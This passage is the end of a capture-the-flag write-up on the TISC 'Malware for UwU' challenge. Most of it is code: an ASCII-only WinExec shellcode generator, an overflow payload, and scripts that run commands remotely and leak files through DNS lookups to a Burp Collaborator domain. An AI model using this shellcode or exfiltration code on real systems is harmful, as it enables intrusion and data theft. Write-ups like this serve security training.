" add ebx, dword ptr [esp];",
" xor dword ptr [edx+ebx+0x27], eax;", # correct ff d7 call edi msiexec
" xor dword ptr [edx+ebx+0x28], eax;", # correct ff d7 call edi
" xor dword ptr [edx+ebx+0x7f], eax;", # correct ff d7 call edi
" xor dword ptr [edx+ebx+0x7f], eax;", # correct ff d7 call edi
" push 0x53736046;", # 60 should xor with 80 to get e0
" pop ebx;", # IAT address pointer to GetModuleHandle in ebx
" push 0x01014001;",
" add ebx, dword ptr [esp];",
" add ebx, dword ptr [esp];",
" push 0x01010101;", # use eax to xor for null bytes in wide string and invalid chars in GetModuleHandle address pointer
" pop eax;", # use eax to xor for null bytes in wide string
" xor edi, dword ptr [ebx];", # dereference IAT, get GetModuleHandle in edi
" push esi;", # nulls for end of wide string
" push 0x01330132;", # push widestring "kernel32" onto stack
" xor dword ptr [esp], eax;",
" push 0x016d0164;",
" xor dword ptr [esp], eax;",
" push 0x016f0173;",
" xor dword ptr [esp], eax;",
" push 0x0164016a;",
" xor dword ptr [esp], eax;",
" push esp;",
" call edi;", # call GetModuleHandle(&"kernel32")
" push eax;", # Kernel32 base address in eax
" pop edi;",
" push esi;", # null bytes
" pop ebx;",
" xor ebx, dword ptr [edi + 0x3C];", # ebx = [kernel32 + 0x3C] = offset(PE header)
" push ebx;", # null out bytes on top of stack
" xor ebx, dword ptr [esp];",
" pop eax;",
" xor ebx, dword ptr [edi + eax + 0x78];", # ebx = [PE32 optional header + offset(PE32 export table offset)] = offset(export table)
" xor esi, dword ptr [edi + ebx + 0x20];", # esi = [kernel32 + offset(export table) + 0x20] = offset(names table)
" push edi;",
" add esi, dword ptr [esp];", # esi = kernel32 + offset(names table) = &(names table)
" xor dword ptr [esp], edi;", # null out bytes on top of stack
" pop edx;",
" xor edx, [edi + ebx + 0x24];", # edx = [kernel32 + offset(export table) + 0x24] = offset(ordinals table)
push_string("WinE"),
" pop ecx;", # ecx = 'WinE'
" find_winexec_x86:"
" push ebp;",
" xor dword ptr [esp], ebp;", # null out bytes on top of stack
" AND ebp, dword ptr [esp];", # nulls out ebp for xor operation
" xor BP, WORD ptr [edi + edx];", # ebp = [kernel32 + offset(ordinals table) + offset] = function ordinal
" INC edx;",
" INC edx;", # edx = offset += 2
" lodsd;", # eax = &(names table[function number]) = offset(function name)
" CMP [edi + eax], ecx; " # *(DWORD*)(function name) == "WinE" ?
" JNE find_winexec_x86;",
" pop esi;",
" xor esi, dword ptr [edi + ebx + 0x1C];", # esi = [kernel32 + offset(export table) + 0x1C] = offset(address table)] = offset(address table)
" push edi;",
" add esi, dword ptr [esp];", # esi = kernel32 + offset(address table) = &(address table)
" push ebp;",
" add ebp, dword ptr [esp];",
" add edi, [esi + ebp * 2];", # edi = kernel32 + [&(address table)[WinExec ordinal]] = offset(WinExec) = &(WinExec)
" push 0x31;", # null out eax
" pop eax;",
" xor al, 0x31;",
" push eax;",
push_string(command), # set up args for WinExec
" push esp;",
" pop ebx;",
" inc eax;",
" push eax;",
" push ebx;",
" inc ecx;", # NOP
" inc ecx;", # NOP
" CALL edi;", # WinExec(&("calc"), 1);
# If you like graceful exits
# " push 0x53736016;",
# " pop ebx;",
# " push 0x01014001;",
# " add ebx, dword ptr [esp];",
# " add ebx, dword ptr [esp];", # ebx = IAT address pointer to TerminateProcess
# " push eax;",
# " xor eax, dword ptr [esp];", # uExitCode = 0
# " push eax;",
# " and edi, dword ptr [esp];", # null out edi
# " xor edi, dword ptr [ebx];", # edi = *TerminateProcess
# " dec eax;", # hProcess = 0xFFFFFFFF
# " push eax;",
# " inc ecx;", # NOP
# " call edi;", # TerminateProcess(0xFFFFFFFF, 0)
]
return "\n".join(asm)
def main(args):
shellcode = ascii_shellcode(args.debug_break)
eng = ks.Ks(ks.KS_ARCH_X86, ks.KS_MODE_32)
encoding, _ = eng.asm(shellcode)
url_encoded_payload = ""
payload = b'UwU' # magic bytes
payload += b'A' * 29 # offset
payload += pack("<L", (0x41410679)) # jns 0x8
payload += pack("<L", (0x55756e78)) # pop ebx ; pop ebp ; retn 0x0004
payload += bytes(encoding) # shellcode
payload += b"A" * (328 - len(payload)) # filler
for enc in payload:
url_encoded_payload += "%{0:02x}".format(enc)
print("url_encoded_payload = " + url_encoded_payload
.replace("%ff%d7", "%7f%57")
.replace("%8b","%0b")
.replace("%fe","%7e")
.replace("%b7","%37")
.replace("%ad","%2d")
.replace("%ee","%6e")
.replace("%ae","%2e")
.replace("%ed", "%6d"))
if __name__ == "__main__":
parser = argparse.ArgumentParser(
description="Creates shellcodes compatible with the OSED lab VM"
)
parser.add_argument(
"-d",
"--debug-break",
help="add a software breakpoint as the first shellcode instruction",
action="store_true",
)
args = parser.parse_args()
main(args)
This time, I had enough bytes to run a ping <BURP COLLABORATOR DOMAIN>
command on the bot masters. Thankfully, I got a pingback!
I excitedly began trying other payloads like the remote PowerShell script execution, msiexec
, and more. However, despite my many attempts, none of these reached my server other than the DNS requests. With a growing sense of dread, I came to terms with what this meant: the challenge expected me to use DNS exfiltration. I confirmed this by sending a series of commands like powershell Add-Content test spaceraccoon
, powershell Add-Content test .<BURP COLLABORATOR URL>
, and powershell "ping $(type test)"
, which resulted in a DNS pingback at spaceraccoon.<BURP COLLABORATOR DOMAIN>
.
While there was good news – I could write to arbitrary files – this further confirmed that DNS exfiltration was the way to go. I began writing a script to automate it. To retrieve the output of a command, I wrote the output to a working file, then appended my Burp Collaborator domain. Next, I replaced any non-DNS-compatible characters using PowerShell. Finally, I pinged the concatenated domain in the file, letting the DNS lookup carry the output to my Collaborator instance.
For example, to retrieve the current working directory, I ran:
def exfil_working_file():
send_command("powershell Add-Content {} .{}. -NoNewLine".format(WORKING_FILE, COLLABORATOR_INSTANCE))
send_command("powershell Add-Content {} burpcollaborator.net -NoNewLine".format(WORKING_FILE))
send_command("powershell ping $(type {})".format(WORKING_FILE))
delete_file(WORKING_FILE)
def get_pwd():
send_command("cmd /c \"cd > {}\"".format(WORKING_FILE))
send_command("powershell \"(Get-Content {}).replace(':', '-') | Set-Content {} -NoNewLine\"".format(WORKING_FILE, WORKING_FILE))
send_command("powershell \"(Get-Content {}).replace('\\', '-') | Set-Content {} -NoNewLine\"".format(WORKING_FILE, WORKING_FILE))
send_command("powershell \"(Get-Content {}).replace(' ', '.') | Set-Content {} -NoNewLine\"".format(WORKING_FILE, WORKING_FILE))
exfil_working_file()
I got a pingback at C--Users-Administrator-AppData-LocalLow.<BURP COLLABORATOR DOMAIN>
, which I converted back to C:\Users\Administrator\AppData\LocalLow
.
Since the master bots included the special UwU.exe
instances with the flag, I aimed to locate and exfiltrate it. I began enumerating the files in the current working directory with:
def get_file_name(index):
send_command("powershell \"Add-Content {} $(ls)[{}].Name -NoNewLine\"".format(WORKING_FILE, index))
send_command("powershell \"(Get-Content {}).replace('_', '-') | Set-Content {} -NoNewLine\"".format(WORKING_FILE, WORKING_FILE))
exfil_working_file()
This leaked the file names Microsoft
, Temp
, and 1_run_uwu1.bat
. This seemed interesting. To exfiltrate files, I first converted them to base64 using certutil
and a special undocumented option. I then replaced the incompatible base64 characters like +
and /
with -
and .
respectively. Unfortunately, I could not use +
directly since \x26
was a bad character, so I replaced it with the functionally-equivalent [char]43
. I also removed any trailing =
characters. Next, I exfiltrated the file in blocks of 50 base64 characters at a time. To ensure that I got the blocks in the correct order, I added the block number before and after the base64 characters as a primitive checksum.
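The character replacements round-trip cleanly; here is a sketch of how the transform can be reversed when reassembling the received blocks (the helper names are my own, not from the original script):

```python
import base64

def dns_safe(b64: str) -> str:
    # Mirror the PowerShell replacements: '+' -> '-', '/' -> '.',
    # and drop the '=' padding (none of which are DNS-label safe).
    return b64.replace("+", "-").replace("/", ".").rstrip("=")

def dns_restore(label: str) -> bytes:
    # Undo the replacements and re-pad before decoding. Safe because
    # '-' and '.' never occur in the base64 alphabet itself.
    b64 = label.replace("-", "+").replace(".", "/")
    return base64.b64decode(b64 + "=" * (-len(b64) % 4))

data = b"\xfb\xffTISC"  # contrived bytes whose base64 hits both '+' and '/'
assert dns_restore(dns_safe(base64.b64encode(data).decode())) == data
```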
def delete_file(filename):
send_command('powershell del {}'.format(filename))
def get_file_length(filename):
send_command("powershell \"Add-Content {} $(Get-Content {}).length -NoNewLine\"".format(WORKING_FILE, filename))
exfil_working_file()
def exfil_file(filename):
base64_file = "e"
block_size = 50
# delete base64 file
delete_file(base64_file)
# create base64 file
send_command("certutil -encodehex -f {} {} 0x40000001".format(filename, base64_file))
# get base64 file length
get_file_length(base64_file)
file_length = int(input("[*] Enter received base64 file length: "))
# replace non-DNS compliant chars
send_command("powershell \"(Get-Content {}).replace([char]43, '-') | Set-Content {}\"".format(base64_file, base64_file))
send_command("powershell \"(Get-Content {}).replace('/', '.') | Set-Content {}\"".format(base64_file, base64_file))
send_command("powershell \"(Get-Content {}).replace('=', '') | Set-Content {}\"".format(base64_file, base64_file))
offset = 0
while offset < file_length:
print("[+] Exfiltrating offset {} in file {}".format(offset, filename))
# Add offset at front and back to prevent .. error and also to ensure that all blocks are received
send_command("powershell \"Add-Content {} {} -NoNewLine\"".format(WORKING_FILE, offset))
if (offset + block_size) > file_length:
send_command("powershell \"Add-Content {} $(Get-Content {}).substring({},{}) -NoNewLine\"".format(WORKING_FILE, base64_file, offset, file_length - offset - 1))
else:
send_command("powershell \"Add-Content {} $(Get-Content {}).substring({},{}) -NoNewLine\"".format(WORKING_FILE, base64_file, offset, block_size))
send_command("powershell \"Add-Content {} {} -NoNewLine\"".format(WORKING_FILE, offset))
offset += block_size
exfil_working_file()
After a long wait, I got the contents of 1_run_uwu1.bat
.
@echo off
echo ^1>uwu_cmds.txt
echo %c2ip%>>uwu_cmds.txt
echo %c2port%>>uwu_cmds.txt
echo ^3>>uwu_cmds.txt
:loop
type uwu_cmds.txt | C:\Users\Administrator\AppData\LocalLow\cmd.exe /c final_uwu_with_flag.exe
taskkill /im werfault.exe /f
goto loop
Great! I could try exfiltrating final_uwu_with_flag.exe
, but my get_file_length
function told me that the base64 encoding of final_uwu_with_flag.exe
was 989868 bytes long, which would have taken days to exfiltrate. Instead, the contents of 1_run_uwu1.bat
gave me an idea – why not pipe inputs to final_uwu_with_flag.exe
to execute the “Display Killswitch” option, write the output to a file, then exfiltrate that instead? I could save even more bytes by grepping the output for the TISC{
flag marker.
def exfil_final_uwu():
delete_file("c")
delete_file("x")
delete_file("y")
send_command("cmd /c \"echo ^4 > c\"")
send_command("cmd /c \"echo ^5 >> c\"")
send_command("cmd /c \"type c | cmd /c final_uwu_with_flag.exe > x\"")
sleep(3) # more time to play UwU sound
send_command("powershell \"Select-String -Path x -Encoding ascii -Pattern TISC|Out-File y\"") # save more time
exfil_file("y")
Without further ado, I started the exfiltration. As each minute ticked by, the base64 strings slowly emerged.
Halfway through, I placed the half-finished base64 string into a decoder, and there it was. I had finally reached the end of this insane odyssey. Thankfully, there was no bonus level, so I submitted my flag and got some sleep.
#!/usr/bin/python3
import requests
import keystone as ks
from struct import pack
from time import sleep
# import uuid
def to_hex(s):
retval = list()
for char in s:
retval.append(hex(ord(char)).replace("0x", ""))
return "".join(retval)
def push_string(input_string):
rev_hex_payload = str(to_hex(input_string))
rev_hex_payload_len = len(rev_hex_payload)
instructions = []
first_instructions = []
null_terminated = False
for i in range(rev_hex_payload_len, 0, -1):
# add every 4 byte (8 chars) to one push statement
if ((i != 0) and ((i % 8) == 0)):
target_bytes = rev_hex_payload[i-8:i]
instructions.append(f"push dword 0x{target_bytes[6:8] + target_bytes[4:6] + target_bytes[2:4] + target_bytes[0:2]};")
# handle the left over instructions
elif ((0 == i-1) and ((i % 8) != 0) and (rev_hex_payload_len % 8) != 0):
if (rev_hex_payload_len % 8 == 2):
first_instructions.append(f"mov al, 0x{rev_hex_payload[(rev_hex_payload_len - (rev_hex_payload_len%8)):]};")
first_instructions.append("push eax;")
elif (rev_hex_payload_len % 8 == 4):
target_bytes = rev_hex_payload[(rev_hex_payload_len - (rev_hex_payload_len%8)):]
first_instructions.append(f"mov ax, 0x{target_bytes[2:4] + target_bytes[0:2]};")
first_instructions.append("push eax;")
else:
target_bytes = rev_hex_payload[(rev_hex_payload_len - (rev_hex_payload_len%8)):]
first_instructions.append(f"mov al, 0x{target_bytes[4:6]};")
first_instructions.append("push eax;")
first_instructions.append(f"mov ax, 0x{target_bytes[2:4] + target_bytes[0:2]};")
first_instructions.append("push ax;")
null_terminated = True
instructions = first_instructions + instructions
asm_instructions = "".join(instructions)
return asm_instructions
def ascii_shellcode(command):
if len(command) > 76:
print("[-] Command is too long!")
exit(1)
padded_command = command + " " * (76 - len(command)) # amount of padding available
asm = [
# at start, eax, esi, edi are nulled
" start:",
" pop edx;",
" pop edx;", # Pointer to shellcode in edx
" xor al, 0x7f;", # inc eax to 0x80 which xors out the ones that are out of reach
" inc eax;",
" xor dword ptr [edx+0x6e], eax;", # correct ff d7 call edi
" xor dword ptr [edx+0x6f], eax;", # correct ff d7 call edi
" push 0x7f;", # dont need ebx, use eax
" pop ebx;",
" xor dword ptr [edx+ebx+0x24], eax;", # correct ad lods eax,dword ptr ds:[esi]
" xor dword ptr [edx+ebx+0x29], eax;", # correct 75 ed jne 0x68
" push 0x7f;",
" add ebx, dword ptr [esp];",
" xor dword ptr [edx+ebx+0x27], eax;", # correct ff d7 call edi
" xor dword ptr [edx+ebx+0x28], eax;", # correct ff d7 call edi
" xor dword ptr [edx+ebx+0x7f], eax;", # correct ff d7 call edi
" xor dword ptr [edx+ebx+0x7f], eax;", # correct ff d7 call edi
" push 0x53736046;", # 60 should xor with 80 to get e0
" pop ebx;", # IAT address pointer to GetModuleHandle in ebx
" push 0x01014001;",
" add ebx, dword ptr [esp];",
" add ebx, dword ptr [esp];",
" push 0x01010101;", # use eax to xor for null bytes in wide string and invalid chars in GetModuleHandle address pointer
" pop eax;", # use eax to xor for null bytes in wide string
" xor edi, dword ptr [ebx];", # dereference IAT, get GetModuleHandle in edi
" push esi;", # nulls for end of wide string
" push 0x01330132;", # push widestring "kernel32"
" xor dword ptr [esp], eax;",
" push 0x016d0164;",
" xor dword ptr [esp], eax;",
" push 0x016f0173;",
" xor dword ptr [esp], eax;",
" push 0x0164016a;",
" xor dword ptr [esp], eax;",
" push esp;",
" call edi;", # call GetModuleHandleW(&"kernel32")
" push eax;", # Kernel32 base address in eax
" pop edi;",
" push esi;", # null bytes
" pop ebx;",
" xor ebx, dword ptr [edi + 0x3C];", # ebx = [kernel32 + 0x3C] = offset(PE header)
" push ebx;", # null out bytes on top of stack
" xor ebx, dword ptr [esp];",
" pop eax;",
" xor ebx, dword ptr [edi + eax + 0x78];", # ebx = [PE32 optional header + offset(PE32 export table offset)] = offset(export table)
" xor esi, dword ptr [edi + ebx + 0x20];", # esi = [kernel32 + offset(export table) + 0x20] = offset(names table)
" push edi;",
" add esi, dword ptr [esp];", # esi = kernel32 + offset(names table) = &(names table)
" xor dword ptr [esp], edi;", # null out value on stack
" pop edx ;",
" xor edx, [edi + ebx + 0x24];", # edx = [kernel32 + offset(export table) + 0x24] = offset(ordinals table)
push_string("WinE"),
" pop ecx;", # ecx = 'WinE'
" find_winexec_x86:"
" push ebp;",
" xor dword ptr [esp], ebp;", # null out bytes on top of stack
" and ebp, dword ptr [esp];", # nulls out ebp for xor operation
" xor BP, WORD ptr [edi + edx];", # ebp = [kernel32 + offset(ordinals table) + offset] = function ordinal
" inc edx;",
" inc edx;", # edx = offset += 2
" lodsd;", # eax = &(names table[function number]) = offset(function name)
" cmp [edi + eax], ecx;" # *(dword*)(function name) == "WinE" ?
" jne find_winexec_x86;",
" pop esi;",
" xor esi, dword ptr [edi + ebx + 0x1C];" # esi = [kernel32 + offset(export table) + 0x1C] = offset(address table)] = offset(address table)
" push edi;",
" add esi, dword ptr [esp];", # esi = kernel32 + offset(address table) = &(address table)
" push ebp;",
" add ebp, dword ptr [esp];",
" add edi, [esi + ebp * 2];", # edi = kernel32 + [&(address table)[WinExec ordinal]] = offset(WinExec) = &(WinExec)
" push 0x31;", # null out eax
" pop eax;",
" xor al, 0x31;",
" push eax;", # nulls
push_string(padded_command), # set up args for WinExec
" push esp;",
" pop ebx;",
" inc eax;",
" push eax;",
" push ebx;",
" inc ecx;", # NOP
" inc ecx;", # NOP
" call edi;", # WinExec(&("calc"), 1);
]
return "\n".join(asm)
# o2r7vffpq263v6rrjsyxq4xp7gd61v.burpcollaborator.net
COLLABORATOR_INSTANCE = "o2r7vffpq263v6rrjsyxq4xp7gd61v"
FILE_NAME = "1_run_uwu1.bat"
BANNED_CHARS = ['%', '&', '+']
C2_URL = 'http://<IP ADDRESS>:18080/send.php'
TARGET_UWUID = '715cf1a6-51de-4a55-be11-c0ffeec0ffee'
WORKING_FILE = 'l'
def send_command(command):
    for banned_char in BANNED_CHARS:
        if banned_char in command:
            print("Banned chars detected in command!")
            exit(1)
    print("[+] Sending command: {}".format(command))
    shellcode = ascii_shellcode(command)
    eng = ks.Ks(ks.KS_ARCH_X86, ks.KS_MODE_32)
    encoding, _ = eng.asm(shellcode)
    payload_string = ""
    payload = b'UwU'
    payload += b'A' * 29
    payload += pack("<L", 0x41410679) + pack("<L", 0x55756e78)
    payload += bytes(encoding)
    payload += b"A" * (328 - len(payload))
    payload = payload.replace(b'\xff\xd7', b'\x7f\x57').replace(b'\x8b', b'\x0b').replace(b'\xfe', b'\x7e').replace(b'\xb7', b'\x37').replace(b'\xad', b'\x2d').replace(b'\xee', b'\x6e').replace(b'\xae', b'\x2e').replace(b'\xed', b'\x6d')
    for enc in payload:
        payload_string += "%{0:02x}".format(enc)
    payload_string = payload_string.replace("%ff%d7", "%7f%57").replace("%8b", "%0b").replace("%fe", "%7e").replace("%b7", "%37").replace("%ad", "%2d").replace("%ee", "%6e").replace("%ae", "%2e").replace("%ed", "%6d")
    headers = {
        'User-Agent': 'UwUserAgent/1.0'
    }
    requests.post(C2_URL, headers=headers, data={'action': 'send', 'a': TARGET_UWUID, 'b': payload})
    sleep(5)
def exfil_working_file():
    send_command("powershell Add-Content {} .{}. -NoNewLine".format(WORKING_FILE, COLLABORATOR_INSTANCE))
    send_command("powershell Add-Content {} burpcollaborator.net -NoNewLine".format(WORKING_FILE))
    send_command("powershell ping $(type {})".format(WORKING_FILE))
    delete_file(WORKING_FILE)
def delete_file(filename):
    send_command('powershell del {}'.format(filename))
def get_file_length(filename):
    send_command("powershell \"Add-Content {} $(Get-Content {}).length -NoNewLine\"".format(WORKING_FILE, filename))
    exfil_working_file()
def exfil_file(filename):
    base64_file = "e"
    block_size = 50
    # delete base64 file
    delete_file(base64_file)
    # create base64 file
    send_command("certutil -encodehex -f {} {} 0x40000001".format(filename, base64_file))
    # get base64 file length
    get_file_length(base64_file)
    file_length = int(input("[*] Enter received base64 file length: "))
    # replace non-DNS compliant chars
    send_command("powershell \"(Get-Content {}).replace([char]43, '-') | Set-Content {}\"".format(base64_file, base64_file))
    send_command("powershell \"(Get-Content {}).replace('/', '.') | Set-Content {}\"".format(base64_file, base64_file))
    send_command("powershell \"(Get-Content {}).replace('=', '') | Set-Content {}\"".format(base64_file, base64_file))
    offset = 0
    while offset < file_length:
        print("[+] Exfiltrating offset {} in file {}".format(offset, filename))
        # Add offset at front and back to prevent .. error and also to ensure that all blocks are received
        send_command("powershell \"Add-Content {} {} -NoNewLine\"".format(WORKING_FILE, offset))
        if (offset + block_size) > file_length:
            send_command("powershell \"Add-Content {} $(Get-Content {}).substring({},{}) -NoNewLine\"".format(WORKING_FILE, base64_file, offset, file_length - offset - 1))
        else:
            send_command("powershell \"Add-Content {} $(Get-Content {}).substring({},{}) -NoNewLine\"".format(WORKING_FILE, base64_file, offset, block_size))
        send_command("powershell \"Add-Content {} {} -NoNewLine\"".format(WORKING_FILE, offset))
        offset += block_size
        exfil_working_file()
## if any blocks were dropped previously
def exfil_lost_block(filename, offset, length):
    print("[+] Exfiltrating offset {} in file {}".format(offset, filename))
    send_command("powershell \"Add-Content {} {} -NoNewLine\"".format(WORKING_FILE, offset))
    send_command("powershell \"Add-Content {} $(Get-Content {}).substring({},{}) -NoNewLine\"".format(WORKING_FILE, filename, offset, length))
    send_command("powershell \"Add-Content {} {} -NoNewLine\"".format(WORKING_FILE, offset))
    exfil_working_file()
## MicrosoftWindowsVersion10.0.14393
def get_version():
    version_file = 'v'
    send_command("cmd /c \"ver > {}\"".format(version_file))
    send_command("powershell \"(Get-Content {}).replace(' ', '') | Set-Content {}\"".format(version_file, version_file))
    send_command("powershell \"(Get-Content {}).replace('[', '') | Set-Content {}\"".format(version_file, version_file))
    send_command("powershell \"(Get-Content {}).replace(']', '') | Set-Content {}\"".format(version_file, version_file))
    send_command("powershell \"(Get-Content {})[1] | Set-Content {} -NoNewLine\"".format(version_file, version_file))
    send_command("powershell \"Add-Content {} $(Get-Content {}) -NoNewLine\"".format(WORKING_FILE, version_file))
    exfil_working_file()
## ec2amaz-9ri345e\administrator
def get_user():
    user_file = 'v'
    send_command("cmd /c \"whoami > {}\"".format(user_file))
    send_command("powershell \"(Get-Content {}).replace('\\', '') | Set-Content {} -NoNewLine\"".format(user_file, user_file))
    send_command("powershell \"Add-Content {} $(Get-Content {}) -NoNewLine\"".format(WORKING_FILE, user_file))
    exfil_working_file()
## C:\Users\Administrator\AppData\LocalLow
def get_pwd():
    send_command("cmd /c \"cd > {}\"".format(WORKING_FILE))
    send_command("powershell \"(Get-Content {}).replace(':', '-') | Set-Content {} -NoNewLine\"".format(WORKING_FILE, WORKING_FILE))
    send_command("powershell \"(Get-Content {}).replace('\\', '-') | Set-Content {} -NoNewLine\"".format(WORKING_FILE, WORKING_FILE))
    send_command("powershell \"(Get-Content {}).replace(' ', '.') | Set-Content {} -NoNewLine\"".format(WORKING_FILE, WORKING_FILE))
    exfil_working_file()
## Microsoft
## Temp
## 1_run_uwu1.bat
def get_file_name(index):
    send_command("powershell \"Add-Content {} $(ls)[{}].Name -NoNewLine\"".format(WORKING_FILE, index))
    send_command("powershell \"(Get-Content {}).replace('_', '-') | Set-Content {} -NoNewLine\"".format(WORKING_FILE, WORKING_FILE))
    exfil_working_file()
def exfil_final_uwu():
    delete_file("c")
    delete_file("x")
    delete_file("y")
    send_command("cmd /c \"echo ^4 > c\"")
    send_command("cmd /c \"echo ^5 >> c\"")
    send_command("cmd /c \"type c | cmd /c final_uwu_with_flag.exe > x\"")
    sleep(3)  # more time to play UwU sound
    send_command("powershell \"Select-String -Path x -Pattern TISC|Out-File y\"")  # save more time
    exfil_file("y")
if __name__ == "__main__":
delete_file(WORKING_FILE)
# get_user()
# get_pwd()
# get_file_name(2)
# exfil_file('1_run_uwu1.bat')
# exfil_lost_block('e', 120, 30)
# exfil_lost_block('e', 330, 13)
# exfil_lost_block('y', 25, 25)
exfil_final_uwu()
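One detail of send_command() worth spelling out: every byte substitution it applies to the assembled shellcode maps a byte to that byte minus 0x80, i.e. it clears the top bit so the final payload is pure ASCII; the two-byte call edi sequence ff d7 is rewritten as a pair. A minimal sketch of that filter (the helper name make_ascii_safe is mine, not from the original script):

```python
# The single-byte substitutions applied in send_command(); each value
# is its key minus 0x80, i.e. the key with the top bit cleared.
SUBS = {0x8b: 0x0b, 0xfe: 0x7e, 0xb7: 0x37, 0xad: 0x2d,
        0xee: 0x6e, 0xae: 0x2e, 0xed: 0x6d}

def make_ascii_safe(payload: bytes) -> bytes:
    # the 'call edi' opcode pair ff d7 is rewritten as a unit first
    payload = payload.replace(b'\xff\xd7', b'\x7f\x57')
    for bad, good in SUBS.items():
        payload = payload.replace(bytes([bad]), bytes([good]))
    return payload
```

How the cleared bits are restored before execution on the target is outside this snippet; the substitutions themselves are exactly those applied in send_command().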
Interestingly, this turned out to be an unintended solution: I was meant to rely purely on the shellcode to transmit the flag via the UwU.exe messaging functions. I had considered this route earlier but decided that setting up the call stack would be too troublesome. Fortunately, life found a way.
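On the attacker side, the DNS labels collected by Burp Collaborator can be decoded by reversing the transformations exfil_file() applies: undo the '+' → '-' and '/' → '.' substitutions, restore the stripped base64 padding, and strip the offset sentinels framing each block. A hedged sketch of that decoder (the helpers are my own reconstruction, not part of the original tooling):

```python
import base64

def strip_sentinels(label, offset):
    """Drop the '<offset>...<offset>' framing around one exfiltrated block."""
    off = str(offset)
    assert label.startswith(off) and label.endswith(off)
    return label[len(off):len(label) - len(off)]

def reassemble(labels):
    """labels: dict mapping block offset -> received DNS label."""
    b64 = "".join(strip_sentinels(labels[off], off) for off in sorted(labels))
    b64 = b64.replace('-', '+').replace('.', '/')  # undo DNS-safe substitutions
    b64 += '=' * (-len(b64) % 4)                   # restore stripped padding
    return base64.b64decode(b64)
```

The offset sentinels double as sequence numbers, which is what makes exfil_lost_block() possible: any block whose sentinel never shows up in the Collaborator log can be re-requested individually.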
TISC{UwU_m@lwArez_4_uWuuUU!}
Conclusion
After two weeks of intense puzzle solving, I finished all 10 levels, claiming $25,000 for charity, as one other participant had completed level 8. CSIT kindly donated the prize money to The Community Chest on my behalf. I got lots of practice exploiting a broad range of targets and crafted my own ASCII-only Windows WinExec shellcode that can be reused in future exploits. It was a trial by fire that gave me more confidence to tackle new CTF domains such as steganography, forensics, and pwn. Many of the later challenges featured twists that forced me to “try harder” beyond existing writeups and conduct my own original research. If I could award prizes to the challenges, they would be:
- Most Hardcore: Malware for UwU
- Best Storyline: 1865 Text Adventure
- Biggest Headache: Get-Shwifty
- Most Dynamic: The Secret
- Biggest Haystack: Knock Knock, Who’s There
- Smallest Needle: Need for Speed
- Smallest Payload: The Magician's Den
- Most Likely to Make Me Guess: Needle in a Greystack
- Most Enraging: Dee Na Saw as a need
- Most Parts: Scratching the Surface
Thank you to the TISC organising team for a great challenge!